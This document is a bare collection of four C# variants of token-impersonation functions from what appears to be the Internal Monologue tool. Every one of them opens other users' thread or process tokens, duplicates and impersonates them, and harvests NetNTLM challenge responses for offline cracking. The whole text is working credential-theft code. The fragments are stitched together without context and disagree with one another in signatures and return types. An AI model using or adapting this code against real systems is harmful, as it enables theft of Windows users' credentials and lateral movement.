public string HandleThread(ProcessThread thread, string challenge, bool verbose) { var output = ""; try { var token = IntPtr.Zero; string SID = null; //Try to get thread handle var handle = OpenThread(0x0040, true, new IntPtr(thread.Id)); //If failed, return if (handle == IntPtr.Zero) { return(output); } if (OpenThreadToken(handle, 0x0008, true, ref token)) { //Get the SID of the token SID = GetLogonId(token); CloseHandle(token); if (!ValidateSID(SID, verbose)) { return(output); } if (OpenThreadToken(handle, 0x0002, true, ref token)) { var sa = new SECURITY_ATTRIBUTES(); sa.nLength = Marshal.SizeOf(sa); var dupToken = IntPtr.Zero; DuplicateTokenEx( token, 0x0002 | 0x0008, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, (int)1, ref dupToken); CloseHandle(token); try { using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken)) { if (verbose == true) { output += string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name); } string result = InternalMonologueForCurrentUser(challenge); //Ensure it is a valid response and not blank if (!string.IsNullOrWhiteSpace(result)) { output += result + "\n"; authenticatedUsers.Add(SID); } else if (verbose == true) { output += string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name); } } } catch { /*Does not need to do anything if it fails*/ } finally { CloseHandle(dupToken); } } } } catch (Exception) { /*Does not need to do anything if it fails*/ } return(output); }
public static void HandleThread(ProcessThread thread, string challenge, bool verbose) { string SID = null; try { //Try to get thread handle var handle = OpenThread(0x0040, true, new IntPtr(thread.Id)); //If failed, return if (handle == IntPtr.Zero) { return; } //Duplicate thread token var token = IntPtr.Zero; var dupToken = IntPtr.Zero; if (OpenThreadToken(handle, 0x0002, true, ref token)) { var sa = new SECURITY_ATTRIBUTES(); sa.nLength = Marshal.SizeOf(sa); DuplicateTokenEx( token, 0x0002 | 0x0008, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, (int)1, ref dupToken); CloseHandle(token); try { //Get the SID of the token StringBuilder sb = new StringBuilder(); int TokenInfLength = 1024; IntPtr TokenInformation = Marshal.AllocHGlobal(TokenInfLength); Boolean Result = GetTokenInformation(dupToken, 1, TokenInformation, TokenInfLength, out TokenInfLength); if (Result) { TOKEN_USER TokenUser = (TOKEN_USER)Marshal.PtrToStructure(TokenInformation, typeof(TOKEN_USER)); IntPtr pstr = IntPtr.Zero; Boolean ok = ConvertSidToStringSid(TokenUser.User.Sid, out pstr); SID = Marshal.PtrToStringAuto(pstr); LocalFree(pstr); } Marshal.FreeHGlobal(TokenInformation); } catch (Exception e) { CloseHandle(dupToken); CloseHandle(handle); } } //Handle each available user only once if (SID != null && authenticatedUsers.Contains(SID) == false) { try { //Impersonate user using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken)) { if (verbose == true) { Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name); } string result = ByteArrayToString(InternalMonologueForCurrentUser(challenge)); //Ensure there is a valid response and not a blank if (result != null && result.Length > 0) { Console.WriteLine(WindowsIdentity.GetCurrent().Name + ":" + challenge + ":" + result); authenticatedUsers.Add(SID); } else if (verbose == true) { Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name); } } } catch (Exception e) { /*Does not need to do anything if it fails*/ } finally { CloseHandle(dupToken); CloseHandle(handle); } } } catch (Exception) { /*Does not need to do anything if it fails*/ } }
public static void HandleThread(ProcessThread thread, string challenge, bool verbose) { try { var token = IntPtr.Zero; var dupToken = IntPtr.Zero; string SID = null; //Try to get thread handle var handle = OpenThread(0x0040, true, new IntPtr(thread.Id)); //If failed, return if (handle == IntPtr.Zero) { return; } if (OpenThreadToken(handle, 0x0008, true, ref token)) { //Get the SID of the token SID = GetLogonId(token); CloseHandle(token); //Check if this user hasn't been handled yet if (SID != null && authenticatedUsers.Contains(SID) == false) { if (OpenThreadToken(handle, 0x0002, true, ref token)) { var sa = new SECURITY_ATTRIBUTES(); sa.nLength = Marshal.SizeOf(sa); DuplicateTokenEx( token, 0x0002 | 0x0008, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, (int)1, ref dupToken); CloseHandle(token); try { using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken)) { if (verbose == true) { Console.WriteLine("Impersonated user " + WindowsIdentity.GetCurrent().Name); } string result = InternalMonologueForCurrentUser(challenge); //Ensure it is a valid response and not blank if (result != null && result.Length > 0) { Console.WriteLine(result); authenticatedUsers.Add(SID); } else if (verbose == true) { Console.WriteLine("Got blank response for user " + WindowsIdentity.GetCurrent().Name); } } } catch (Exception e) { /*Does not need to do anything if it fails*/ } finally { CloseHandle(dupToken); } } } } } catch (Exception) { /*Does not need to do anything if it fails*/ } }
public InternalMonologueConsole HandleProcess(Process process, string challenge, bool verbose) { var console = new InternalMonologueConsole(); try { var token = IntPtr.Zero; var dupToken = IntPtr.Zero; string SID = null; if (OpenProcessToken(process.Handle, 0x0008, ref token)) { //Get the SID of the token SID = GetLogonId(token); CloseHandle(token); if (!ValidateSID(SID, verbose)) { return(null); } if (verbose) { console.AddConsole(string.Format("{0} {1}\n", SID, process.ProcessName)); } if (OpenProcessToken(process.Handle, 0x0002, ref token)) { var sa = new SECURITY_ATTRIBUTES(); sa.nLength = Marshal.SizeOf(sa); DuplicateTokenEx( token, 0x0002 | 0x0008, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, (int)1, ref dupToken); CloseHandle(token); try { using (WindowsImpersonationContext impersonatedUser = WindowsIdentity.Impersonate(dupToken)) { if (verbose == true) { console.AddConsole(string.Format("Impersonated user {0}\n", WindowsIdentity.GetCurrent().Name)); } var result = InternalMonologueForCurrentUser(challenge, true); //Ensure it is a valid response and not blank if (!result.Resp1.IsNullOrWhiteSpace()) { console.AddResponse(result); console.AddConsole(string.Format("{0}\n", result.ToString())); authenticatedUsers.Add(SID); } else if (verbose == true) { console.AddConsole(string.Format("Got blank response for user {0}\n", WindowsIdentity.GetCurrent().Name)); } } } catch { /*Does not need to do anything if it fails*/ } finally { CloseHandle(dupToken); } } } } catch (Exception) { /*Does not need to do anything if it fails*/ } return(console); }